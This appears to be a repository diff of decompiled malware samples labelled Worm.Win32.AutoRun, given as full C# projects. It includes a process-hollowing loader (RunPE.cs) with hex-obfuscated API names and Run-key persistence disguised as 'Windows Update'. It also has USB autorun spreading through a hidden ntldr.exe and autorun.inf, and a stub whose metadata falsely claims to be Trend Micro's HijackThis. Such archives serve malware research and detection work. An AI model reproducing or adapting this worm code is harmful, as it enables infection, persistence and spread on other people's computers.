</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/RunPE.cs
+407
View File
@@ -0,0 +1,407 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.RunPE
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace BCV5StuB
{
public sealed class RunPE : NativeDllCalls
{
private const int CONTEXT_X86 = 65536;
private const int CONTEXT86_INTEGER = 65538;
private const long MEM_COMMIT = 4096;
private const long MEM_RESERVE = 8192;
private const long PAGE_EXECUTE_READWRITE = 64;
private const long PAGE_EXECUTE_READ = 32;
private const long PAGE_EXECUTE = 16;
private const long PAGE_NOACCESS = 1;
private const long PAGE_READWRITE = 4;
private const uint PAGE_READONLY = 2;
private const string KERNEL32HEX = "0x6b65726e656c3332";
private const string NTDLLHEX = "0x6e74646c6c";
[DebuggerNonUserCode]
public RunPE()
{
}
private long Protect(long characteristics) => Conversions.ToLong(new object[8]
{
(object) 1L,
(object) 16L,
(object) 2U,
(object) 32L,
(object) 4L,
(object) 64L,
(object) 4L,
(object) 64L
}[checked ((int) this.RShift(characteristics, 29L))]);
private long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (this.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift))));
private double vbLongToULong(long Value) => Value < 0L ? (double) Value + 4294967296.0 : (double) Value;
public bool SRexec(string sExePath, string sVictim)
{
bool flag;
return File.Exists(sExePath) ? this.SRexec(File.ReadAllBytes(sExePath), sVictim) : flag;
}
public bool SRexec(byte[] b, string sVictim)
{
RunPE.IMAGE_DOS_HEADER imageDosHeader1 = new RunPE.IMAGE_DOS_HEADER();
RunPE.CONTEXT lpContext = new RunPE.CONTEXT();
RunPE.IMAGE_NT_HEADERS imageNtHeaders1 = new RunPE.IMAGE_NT_HEADERS();
RunPE.IMAGE_SECTION_HEADER imageSectionHeader1 = new RunPE.IMAGE_SECTION_HEADER();
RunPE.PROCESS_INFORMATION lpProcessInformation = new RunPE.PROCESS_INFORMATION();
RunPE.STARTUPINFO lpStartupInfo = new RunPE.STARTUPINFO();
RunPE.SECURITY_ATTRIBUTES lpProcessAttributes = new RunPE.SECURITY_ATTRIBUTES();
RunPE.SECURITY_ATTRIBUTES lpThreadAttributes = new RunPE.SECURITY_ATTRIBUTES();
GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned);
IntPtr ptr = gcHandle.AddrOfPinnedObject();
int int32 = ptr.ToInt32();
object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType());
RunPE.IMAGE_DOS_HEADER imageDosHeader2;
RunPE.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (RunPE.IMAGE_DOS_HEADER) structure1 : imageDosHeader2;
gcHandle.Free();
IntPtr lpEnvironment;
if (!((RunPE.CreateProcessA) this.DynamicCall("0x6b65726e656c3332", "0x43726561746550726f6365737341", typeof (RunPE.CreateProcessA)))((string) null, sVictim, ref lpProcessAttributes, ref lpThreadAttributes, false, 4U, lpEnvironment, (string) null, ref lpStartupInfo, out lpProcessInformation))
return false;
ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew));
object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType());
RunPE.IMAGE_NT_HEADERS imageNtHeaders2;
RunPE.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (RunPE.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2;
lpStartupInfo.cb = Strings.Len((object) lpStartupInfo);
lpContext.ContextFlags = 65538U;
if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117)
return false;
RunPE.GetThreadContext getThreadContext = (RunPE.GetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x476574546872656164436f6e74657874", typeof (RunPE.GetThreadContext));
RunPE.ReadProcessMemory readProcessMemory1 = (RunPE.ReadProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x5265616450726f636573734d656d6f7279", typeof (RunPE.ReadProcessMemory));
RunPE.ZwUnmapViewOfSection unmapViewOfSection = (RunPE.ZwUnmapViewOfSection) this.DynamicCall("0x6e74646c6c", "0x5a77556e6d6170566965774f6653656374696f6e", typeof (RunPE.ZwUnmapViewOfSection));
int num1 = getThreadContext(lpProcessInformation.hThread, ref lpContext) ? 1 : 0;
RunPE.ReadProcessMemory readProcessMemory2 = readProcessMemory1;
IntPtr hProcess1 = lpProcessInformation.hProcess;
int lpBaseAddress1 = checked ((int) ((long) lpContext.Ebx + 8L));
long num2;
ptr = (IntPtr) num2;
ref IntPtr local1 = ref ptr;
int num3 = 0;
ref int local2 = ref num3;
int num4 = readProcessMemory2(hProcess1, lpBaseAddress1, ref local1, 4, ref local2);
long num5 = (long) ptr;
int num6 = num4 >= 0 ? 1 : 0;
if ((num1 & num6 & (unmapViewOfSection(lpProcessInformation.hProcess, (IntPtr) num5) >= 0L ? 1 : 0)) == 0)
return false;
uint num7 = checked ((uint) (int) ((RunPE.VirtualAllocEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c416c6c6f634578", typeof (RunPE.VirtualAllocEx)))(lpProcessInformation.hProcess, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U));
if (num7 == 0U)
return false;
RunPE.WriteProcessMemory writeProcessMemory1 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
IntPtr hProcess2 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress2 = (IntPtr) (long) num7;
byte[] lpBuffer1 = b;
int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders);
uint num8;
int num9 = checked ((int) num8);
ref int local3 = ref num9;
int num10 = writeProcessMemory1(hProcess2, lpBaseAddress2, lpBuffer1, sizeOfHeaders, out local3) ? 1 : 0;
uint num11 = checked ((uint) num9);
long num12 = (long) checked (imageDosHeader3.e_lfanew + 248);
int num13 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1);
int num14 = 0;
while (num14 <= num13)
{
ptr = new IntPtr(checked ((long) int32 + num12 + (long) (num14 * 40)));
object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType());
RunPE.IMAGE_SECTION_HEADER imageSectionHeader2;
imageSectionHeader1 = structure3 != null ? (RunPE.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2;
byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)];
int num15 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L));
int index = 0;
while (index <= num15)
{
numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))];
checked { ++index; }
}
RunPE.WriteProcessMemory writeProcessMemory2 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
RunPE.VirtualProtectEx virtualProtectEx = (RunPE.VirtualProtectEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c50726f746563744578", typeof (RunPE.VirtualProtectEx));
RunPE.WriteProcessMemory writeProcessMemory3 = writeProcessMemory2;
IntPtr hProcess3 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress3 = (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress);
byte[] lpBuffer2 = numArray;
int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData);
num9 = checked ((int) num11);
ref int local4 = ref num9;
int num16 = writeProcessMemory3(hProcess3, lpBaseAddress3, lpBuffer2, sizeOfRawData, out local4) ? 1 : 0;
num11 = checked ((uint) num9);
int num17 = virtualProtectEx(lpProcessInformation.hProcess, (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) this.Protect((long) imageSectionHeader1.Characteristics)), checked ((uint) num5));
checked { ++num14; }
}
byte[] bytes = BitConverter.GetBytes(num7);
RunPE.WriteProcessMemory writeProcessMemory4 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
IntPtr hProcess4 = lpProcessInformation.hProcess;
IntPtr lpBaseAddress4 = (IntPtr) checked ((long) lpContext.Ebx + 8L);
byte[] lpBuffer3 = bytes;
num9 = checked ((int) num11);
ref int local5 = ref num9;
int num18 = writeProcessMemory4(hProcess4, lpBaseAddress4, lpBuffer3, 4, out local5) ? 1 : 0;
num8 = checked ((uint) num9);
lpContext.Eax = checked (num7 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint);
RunPE.SetThreadContext setThreadContext = (RunPE.SetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x536574546872656164436f6e74657874", typeof (RunPE.SetThreadContext));
RunPE.ResumeThread resumeThread = (RunPE.ResumeThread) this.DynamicCall("0x6b65726e656c3332", "0x526573756d65546872656164", typeof (RunPE.ResumeThread));
bool flag;
return setThreadContext(lpProcessInformation.hThread, ref lpContext) ? resumeThread(lpProcessInformation.hThread) > 0U : flag;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct STARTUPINFO
{
public int cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public int dwX;
public int dwY;
public int dwXSize;
public int dwYSize;
public int dwXCountChars;
public int dwYCountChars;
public int dwFillAttribute;
public int dwFlags;
public short wShowWindow;
public short cbReserved2;
public int lpReserved2;
public int hStdInput;
public int hStdOutput;
public int hStdError;
}
private struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
private struct IMAGE_DOS_HEADER
{
public ushort e_magic;
public ushort e_cblp;
public ushort e_cp;
public ushort e_crlc;
public ushort e_cparhdr;
public ushort e_minalloc;
public ushort e_maxalloc;
public ushort e_ss;
public ushort e_sp;
public ushort e_csum;
public ushort e_ip;
public ushort e_cs;
public ushort e_lfarlc;
public ushort e_ovno;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] e_res1;
public ushort e_oemid;
public ushort e_oeminfo;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] e_res2;
public int e_lfanew;
}
private struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
private struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
private struct CONTEXT
{
public uint ContextFlags;
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
public RunPE.FLOATING_SAVE_AREA FloatSave;
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SegCs;
public uint EFlags;
public uint Esp;
public uint SegSs;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] ExtendedRegisters;
}
private struct IMAGE_OPTIONAL_HEADER32
{
public ushort Magic;
public byte MajorLinkerVersion;
public byte MinorLinkerVersion;
public uint SizeOfCode;
public uint SizeOfInitializedData;
public uint SizeOfUninitializedData;
public uint AddressOfEntryPoint;
public uint BaseOfCode;
public uint BaseOfData;
public uint ImageBase;
public uint SectionAlignment;
public uint FileAlignment;
public ushort MajorOperatingSystemVersion;
public ushort MinorOperatingSystemVersion;
public ushort MajorImageVersion;
public ushort MinorImageVersion;
public ushort MajorSubsystemVersion;
public ushort MinorSubsystemVersion;
public uint Win32VersionValue;
public uint SizeOfImage;
public uint SizeOfHeaders;
public uint CheckSum;
public ushort Subsystem;
public ushort DllCharacteristics;
public uint SizeOfStackReserve;
public uint SizeOfStackCommit;
public uint SizeOfHeapReserve;
public uint SizeOfHeapCommit;
public uint LoaderFlags;
public uint NumberOfRvaAndSizes;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public RunPE.IMAGE_DATA_DIRECTORY[] DataDirectory;
}
private struct IMAGE_FILE_HEADER
{
public ushort Machine;
public ushort NumberOfSections;
public uint TimeDateStamp;
public uint PointerToSymbolTable;
public uint NumberOfSymbols;
public ushort SizeOfOptionalHeader;
public ushort Characteristics;
}
private struct IMAGE_DATA_DIRECTORY
{
public uint VirtualAddress;
public uint Size;
}
private struct IMAGE_NT_HEADERS
{
public uint Signature;
public RunPE.IMAGE_FILE_HEADER FileHeader;
public RunPE.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
}
private struct Misc
{
public uint PhysicalAddress;
public uint VirtualSize;
}
private struct IMAGE_SECTION_HEADER
{
public byte Name;
public RunPE.Misc Misc;
public uint VirtualAddress;
public uint SizeOfRawData;
public uint PointerToRawData;
public uint PointerToRelocations;
public uint PointerToLinenumbers;
public ushort NumberOfRelocations;
public ushort NumberOfLinenumbers;
public uint Characteristics;
}
private enum ImageSignatureTypes
{
IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C
IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C
IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E
IMAGE_NT_SIGNATURE = 17744, // 0x00004550
IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D
}
private delegate uint ResumeThread(IntPtr hThread);
private delegate bool GetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
private delegate bool SetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);
private delegate bool CreateProcessA(
string lpApplicationName,
string lpCommandLine,
ref RunPE.SECURITY_ATTRIBUTES lpProcessAttributes,
ref RunPE.SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref RunPE.STARTUPINFO lpStartupInfo,
out RunPE.PROCESS_INFORMATION lpProcessInformation);
private delegate bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int iSize,
out int lpNumberOfBytesWritten);
private delegate int ReadProcessMemory(
IntPtr hProcess,
int lpBaseAddress,
ref IntPtr lpbuffer,
int size,
ref int lpNumberOfBytesRead);
private delegate long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress);
private delegate IntPtr VirtualAllocEx(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
uint flAllocationType,
uint flProtect);
private delegate int VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
UIntPtr dwSize,
UIntPtr flNewProtect,
[Out] uint lpflOldProtect);
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Worm.Win32.AutoRun.hgi.csproj
+59
View File
@@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EAC86A47-6334-41FF-B661-ED44E990621E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Windows</AssemblyName>
<ApplicationVersion>7.8.9.10</ApplicationVersion>
<RootNamespace>BCV5StuB</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Antis.cs" />
<Compile Include="rc4.cs" />
<Compile Include="Form1.cs" />
<Compile Include="NativeDllCalls.cs" />
<Compile Include="ResourceReader.cs" />
<Compile Include="RunPE.cs" />
<Compile Include="usb.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Worm.Win32.AutoRun.hgi.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Windows", "Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.csproj", "{EAC86A47-6334-41FF-B661-ED44E990621E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EAC86A47-6334-41FF-B661-ED44E990621E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EAC86A47-6334-41FF-B661-ED44E990621E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EAC86A47-6334-41FF-B661-ED44E990621E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EAC86A47-6334-41FF-B661-ED44E990621E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/rc4.cs
+115
View File
@@ -0,0 +1,115 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.rc4
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Text;
using System.Threading;
namespace BCV5StuB
{
internal class rc4
{
[DebuggerNonUserCode]
public rc4()
{
}
public static string rc4(string message, string password)
{
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = password.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = password.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
location1 = 1;
while (location1 <= message.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(message.Substring(checked (location1 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
string str = stringBuilder.ToString();
stringBuilder.Length = 0;
return str;
}
public static object Startup()
{
try
{
if (!File.Exists(Path.GetTempPath() + "win_update.exe"))
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + "win_update.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Windows Update", (object) (Path.GetTempPath() + "win_update.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("Windows Update", (object) (Path.GetTempPath() + "win_update.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
object obj;
return obj;
}
public static object Antis()
{
object obj;
return obj;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/usb.cs
+47
View File
@@ -0,0 +1,47 @@
// Decompiled with JetBrains decompiler
// Type: BCV5StuB.usb
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using BCV5StuB.My;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Reflection;
namespace BCV5StuB
{
[StandardModule]
internal sealed class usb
{
public static void usb_sp()
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
string str = logicalDrives[index];
try
{
if (!File.Exists(str + "ntldr.exe"))
File.Copy(Assembly.GetExecutingAssembly().Location, str + "ntldr.exe");
StreamWriter streamWriter = new StreamWriter(str + "autorun.inf");
streamWriter.WriteLine("[autorun]");
streamWriter.WriteLine("open=ntldr.exe");
streamWriter.WriteLine("shellexecute=ntldr.exe");
streamWriter.Close();
File.SetAttributes(str + "autorun.inf", FileAttributes.Hidden);
File.SetAttributes(str + "ntldr.exe", FileAttributes.Hidden);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++index; }
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: NeutralResourcesLanguage("en-US")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("© 2007 Trend Micro Inc")]
[assembly: AssemblyFileVersion("2.00.0002")]
[assembly: Guid("ae76d62a-92e8-46c0-84c7-bdef60ffe5d2")]
[assembly: AssemblyProduct("Hijack This")]
[assembly: AssemblyCompany("Trend Micro Inc")]
[assembly: AssemblyDescription("Hijack This")]
[assembly: AssemblyTitle("Hijack This")]
[assembly: AssemblyVersion("2.0.2.0")]
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/F7h5o2wX4skMmN8HU.cs
+87
View File
@@ -0,0 +1,87 @@
// Decompiled with JetBrains decompiler
// Type: F7h5o2wX4skMmN8HU
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
public class F7h5o2wX4skMmN8HU
{
[DebuggerNonUserCode]
public F7h5o2wX4skMmN8HU()
{
}
private void JJc3lN5Q354E28qPjqzLv0u()
{
while (true)
{
int num = (int) MessageBox.Show(":…D~eP€c5}%8n[~0\u008D\u007Fxsƒ9,k388fD~UŠ");
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
private object hU7T7SR9rlwgI08J72P1()
{
int num1 = (int) MessageBox.Show("Š>+b71,CI *izej#C…‘m|yQmauw†V'04]>(bSms%dx‡iR 0-&enŽ‹1€P UM8€Bƒˆg>GaT7=uv5lxŠBvvI ]Y'd,;1R7Fr8A‡‘6lak6NP84\u008F4j(3jUVBFO_l:FBP Š#]†wyˆ.)4p}/(\u0081O0'YI$o<");
int num2 = (int) MessageBox.Show("'jh6.\u008FŽZI:w=F\u008FasR=N€38lsP‡FRTUw%Wh2‚Ž,}€M\u007F\u008FnID\u0090xCBE=‹†R\u008FUb:h[%‡VqyCGNƒV0d yKo%&cIm13Rz^/45LL…4DGY\u008Fc hIR~4lŠ-&?P[i?\u0081‡s$Š:428V)=OnQS6(UbsCqG=-f!.‰Žƒ;ˆUS7U%I");
string str1 = "ŒDALQyR;€\\V‡M€1BtP$zJ*\u007FCC)Q.Hi0VA„ƒ']~$<BY~‡K^.'dsŽ\u008DD]b9U).p!}†7";
string str2 = "C8$`=kO_~I@lfgipcp&BEed6F)D](Kv!k\u0081]\u008D%S@.d^KI?f‰b62hiR †Q\u008F|Ša+v] x*oj0OŠqy::Šr3uF‰u,aj\u008D+<\\q#a|L";
int num3 = 6;
do
{
checked { ++num3; }
}
while (num3 <= 627642035);
double num4 = 5559.0;
str2 = "LX83rpivJg90FMUFF3THHXJtCv6Hz7hSkgi3IM8T5DGjK148HR2Wg5qt0Z9i1GqqiPj4l9x49Xu20rVS01uOQoQ1SSlUa52QBO6F67HDOknL1368WcePbV4f7D9S587B9l0ct4l3nes36Aiv9T0WE1OJ3Mdb0g5cZ5anO28FxCErA8aRqE";
try
{
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
str1 = "Eg31u4K7y7AHac8rkby7SB9pUhlb166nF78oGi1LbXEE5FZQO7S1aDEU4QnD611gUJoXZfEThp3UP56gu2ThFqB7b49w2V7Pf3Ws0s42bW8p";
int num5 = 4744592;
do
{
num4 = 62875.0;
num4 = 5.0;
str2 = "Id00r0AboTgN0cXt3cmiIvh4E6T9ASp5DXfzV0lQB0";
try
{
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
while (true)
;
}
int num6 = (int) Interaction.MsgBox((object) "UWy93Gdc6PHsr");
checked { ++num5; }
}
while (num5 <= 257267654);
int num7 = (int) Interaction.MsgBox((object) "I‰F4gE„R+4");
ProjectData.ClearProjectError();
}
return (object) 458;
}
public object y29r8lPBUMvR07sz4J0()
{
while (true)
;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/Form1.cs
+872
View File
@@ -0,0 +1,872 @@
// Decompiled with JetBrains decompiler
// Type: Form1
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
